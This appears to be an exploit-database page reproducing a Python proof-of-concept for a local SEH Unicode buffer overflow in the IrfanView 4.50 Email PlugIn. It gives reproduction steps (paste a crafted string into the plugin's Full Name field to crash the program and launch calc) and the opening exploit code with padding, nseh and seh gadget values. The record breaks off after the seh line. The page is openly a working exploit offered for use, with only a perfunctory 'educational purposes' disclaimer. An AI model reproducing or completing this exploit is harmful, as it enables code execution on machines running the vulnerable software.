Exploits / Vulnerability Discovered : 2018-03-02 |
Type : local |
Platform : windows
This exploit / vulnerability Irfanview 4.50 email plugin buffer overflow (seh unicode) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
#!/usr/bin/python
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: IrfanView 4.50 Email PlugIn - Local Buffer Overflow (SEH Unicode)
# Date: 02-07-2018
# Vulnerable Software: IrfanView 4.50 Email PlugIn
# Vendor Homepage: http://www.irfanview.com/
# Version: 4.50
# Software Link: http://www.irfanview.info/files/irfanview_450.exe
# Software Link: http://www.irfanview.info/files/irfanview_plugins_450.zip
# Tested Windows 7 SP1 x86
#
# More reliable result if .NET and updates installed prior to application being installed
#
#
# PoC
# 1. generate irfan.txt, copy contents to clipboard
# 2. open IrfanView and a sample image from My Pictures (i.e. Chrysanthemum.jpg)
# 3. select Options, Send by Email, Settings
# 4. paste contents from clipboard into Full Name and select OK
# 5. application crashes
# 6. pop calc
# ****if calc doesn't pop on first try, repeat steps 2-4 until it does :/
#
filename="irfan.txt"
#junk to offset
junk = "\x41"*262
#popad
nseh = "\x61\x62"
#0x00500102 pop esi pop ebx ret
#unicode possible ansi transform(s) : 0050008A->00500106,ascii {PAGE_EXECUTE_READ} [i_view32.exe]
seh = "\x8a\x50"